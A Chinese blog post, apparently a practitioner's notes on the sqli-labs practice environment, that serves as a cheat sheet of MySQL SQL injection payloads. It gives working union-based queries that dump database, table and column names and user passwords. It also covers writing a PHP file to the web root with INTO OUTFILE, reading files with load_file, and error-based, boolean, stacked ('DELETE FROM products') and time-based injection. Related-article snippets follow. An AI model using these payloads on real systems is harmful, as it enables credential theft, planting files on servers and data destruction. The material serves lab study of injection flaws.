sql 注入 mysql_基于MySQL SQL注入语句记录

最新推荐文章于 2024-03-20 22:30:22 发布
最新推荐文章于 2024-03-20 22:30:22 发布
阅读量127 收藏
点赞数
文章标签: sql 注入 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30465829/article/details/113136194
版权

1.联合查询下的数据获取语句

获取数据库名称的语句

http://127.0.0.1/sqli/less-1/

?id=-1'union select 1,2,(database())--+

http://127.0.0.1/sqli/less-1/

?id=-1'union select 1,2,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)--+

ec2bd18b9c9d4cd5e060b7cfa3079c64.png

获取数据库中表的名称

http://127.0.0.1/sqli/less-1/

?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

f8c398243323b34adc6657fa877975f3.png

获取数据库中字段名称的语句

http://127.0.0.1/sqli/less-1/

?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),3--+

729e8e4703f42f2daed7adcc98937c42.png

查询数据库中列的信息

http://127.0.0.1/sqli/less-1/?id=-1' union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 0,1),3--+

http://127.0.0.1/sqli/less-1/?id=-1' union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 1,1),3--+

b5a010fdd83310fc34a8193be045abd7.png

获取数据库路径

http://10.1.2.85/sqli/Less-1/?id=-1' union select 1,@@datadir,3--+

http://10.1.2.85/sqli/Less-1/?id=-1' union select 1,@@basedir,3--+

1419cade02cf894f3d89aa47458c7e92.png

写入文件

http://10.1.2.85/sqli/Less-1/?id=-1' union select 1,2,'<?php phpinfo();?>' into outfile 'C://phpStudy/PHPTutorial/WWW/into.php'--+ (路径为反斜杠)

7df94dcdf69b9826bb105881d3d8eac0.png

读取文件

http://10.1.2.85/sqli/Less-1/?id=-1' union select 1,2,load_file('C://2.txt')--+

613178cf5ddb94422b1737601ca57134.png

2.报错型注入 获取数据

floor()函数报错 注:输出字符长度限制为64个字符

and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

c986e1fd274190ebae1454ab3372d940.png

updatexml()函数报错 注:输出字符有长度限制,最长32位

and updatexml(1,concat(0x404040,(payload),0x4040),123)--+and updatexml(1,concat(0x404040,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x4040),123)--+

c0d77a05dad21f6a683349870505242a.png

ExtractValue()报错注入 注:输出字符有长度限制,最长32位

and extractvalue(1, concat(0x7e,@@version,0x7e))

a40a79b9b4eb59a91b47595239145b31.png

3.布尔型注入语句

and length(database())=1and substr(database(),1,1)=‘t’ --+and substr(database(),2,1)=‘q’ --+and ord(substr(database(),1,1))=115and ord(mid((select table_name from information_schema.tables where table_schema='数据库名' limit 0,1) ,1,1))=101 --+ limit(0,1)第一个表名

and ascii(substr(database(),1,1))=1--+

4.堆叠注入

在SQL中,分号(;)是用来表示一条sql语句的结束。在结束一个sql语句后继续构造下一条语句,一起执行, 因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间区别就在于 union 或者union all执行的语句类型是有限的,可以用来执行的是查询语句,而堆叠注入可以执行的是任意的语句。 例如以下这个例子。用户输入:1; DELETE FROM products;服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products;当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

5.延时注入

and if(length(database())=8,sleep(5),1) --+

架狙只打脚
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入SQL injection)
l_010的博客
06-21 558
SQL注入SQL injection)
MYSQL注入语句
聚鼎安全
01-08 428
常用词汇 information_schema information_schema.schemata 查库名 [[注入函数#系统信息函数]] information_schema.tables 查表名 table_schema 指定表的数据库 table_name 表名 column_name 列名 变量形式 table_schema=database(),[[hex编码]],[[char()]] 不用单引号: select ‘root’(英文形式的单引号) select ch
SQL注入MYSQL基础语句(持续更新)附图
weixin_44431280的博客
03-19 5582
SQL注入mysql基础语句 简介:常见的Web安全漏洞中,SQL注入利用和危害极大,通过其可以直接获取数据表的内容,从而获得Web站点的账号和密码,在学习SQL注入时,我们需要先对常见的数据库基础进行学习和了解。 MYSQL基础语句 一:数据库操作 1,在当前数据库管理系统中创建/删除数据库:create/drop dadabase websec; 2,查看当前数据库管理系统下所有数据库:show databases; 3,使用(进入)操作的数据库,use websec; 二:数据表操作 1,创建数据
详细|通过mysql学习sql注入
st3pby的博客
06-08 976
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
sql注入(4)mysql注入
c10udz的博客
04-13 4707
1.MySQL5.x结构框架 在MySQL 5.0以上版本中,为了方便管理,默认定义了information_schema数据 库,用来存储数据库元信息,其中经常用到的表有:schemata(记录数据库名),tables(记录表名),columns(列名或字段名) 在schemata表中,schema_name(记录数据库名) 在tables表中,table_schema(记录存储的数据库名),table_name(表名)(schema_name和table_name都记录MySQL中所有的数据库名
SQL注入(一)-基础
qq_47848569的博客
05-29 1597
sql注入
MySQL数据库SQL语句
LINGYUEMM的博客
04-19 418
这里写目录标题数据表配置MySQL高级SL语句常用查询按关键字排序EXISTS 数据表配置 MySQL高级SL语句 常用查询 对MySQL数据库的查询,除了基本的查询外,有时候需要对查询的结果集进行处理。例如只取10条数据,对查询结果进行排序或分组等等。 按关键字排序 PS:类比windoes任务管理器 使用SELECT 语句可以将需要的数据从mysl数据库种查询出来,如果对查询的结果进行排序,可以使用ORDER BY语句来完成排序, 并最终将排序后的结果返回给用户。这个语句的排序不光可以针对某一个字段
sql.rar_MYSQL_MYSQL ppt_sql 练习
09-14
接着,"ppt"部分很可能是通过演示文稿的形式,详细介绍了MySQL的安装配置、数据类型、SQL语言基础,如SELECT语句用于查询数据,INSERT语句用于插入数据,UPDATE语句用于修改数据,以及DELETE语句用于删除数据。...
SQL.rar_labview mysql_mysql labview_sql
09-21
标题“SQL.rar_labview mysql_mysql labview_sql”和描述“在labview中实现数据库MySQL调用的节点函数...在实际项目中,确保遵循最佳实践,如使用预编译的SQL语句防止SQL注入,以及适时关闭数据库连接以优化资源利用。
MySQL开启记录执行过的SQL语句方法
01-19
很多时候,我们需要知道 MySQL 执行过哪些 SQL 语句,比如 MySQL注入后,需要知道造成什么伤害等等。只要有 SQL 语句记录,就能知道情况并作出对策。服务器是可以开启 MySQLSQL 语句记录功能,从而就能间接...
PHP+MysqlSQL注入源码 下载
04-25
SQL注入是指攻击者通过输入恶意的SQL语句,来操纵数据库,获取、修改、删除敏感数据,甚至完全控制数据库服务器。例如,一个简单的用户登录表单,如果未对用户输入进行充分的验证和转义,攻击者可以构造特定的输入,...
sql注入
qq_49714982的博客
04-06 1615
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入类型与技巧
求大佬师傅带
09-01 4256
SQL注入类型与技巧
SQL注入详解(主要针对MySQL)
Rockboy777的博客
08-09 468
权限不足时也受影响;join绕过,如:union select 1,2,3 -> union select from (select 1)a join (select 2) join (select 3)substr()和mid()使用from for,如substr(database() from 1 for 1)表示将字符串从1位置截取长度1,mid()同理。
sql注入 mysql 篇 详细使用方式
最新发布
weixin_45425685的博客
03-20 1167
sql注入mysql
超全SQL注入实用语句
热门推荐
weixin_44866139的博客
04-28 1万+
目录判断是否存在注入判断列数Union联合注入爆数据库爆表爆字段爆数据sql盲注导入导出文件Post注入修改useragent:修改referer:修改cookiegroup_concat二次排序注入绕过 or 和 and 过滤绕过空格的过滤宽字节注入堆叠注入order by后的injectionmysqli_multi_query()函数 判断是否存在注入 在 http://127.0.0.1/...
mysqlsql注入
清风微醺的博客
04-18 2369
sql注入攻击实例mysql_SQL注入攻击案例 SQL注入案例 所谓的sql注入本质上还是执行sql语句 检测注入点 判断是否存在sql注入可能 判断当前表有多少字段 利用order by n select * from tag order by 2; order by n以第n个column排序,如果n大于表中字段个数会报错。 SQL注入常用爆库语句 爆库 SELECT * FROM `tag` where id = 3 union select 1,database(); 查询informat
渗透之SQL注入-MYSQL常用语法
时光
07-13 1354
渗透测试之sql注入mysql的基本用法
SQL Injection with MySQL
11-11 1436
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
SQL注入攻防手册:MySQL与MSSQL函数与技巧
1. **MySQL注入原理**:当用户输入的数据未经适当过滤或转义,直接拼接到SQL语句中执行时,就可能造成注入。攻击者可以通过尝试不同的参数和表达式来探测数据库的结构和信息。 2. **测试参数与类型**:确定注入参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值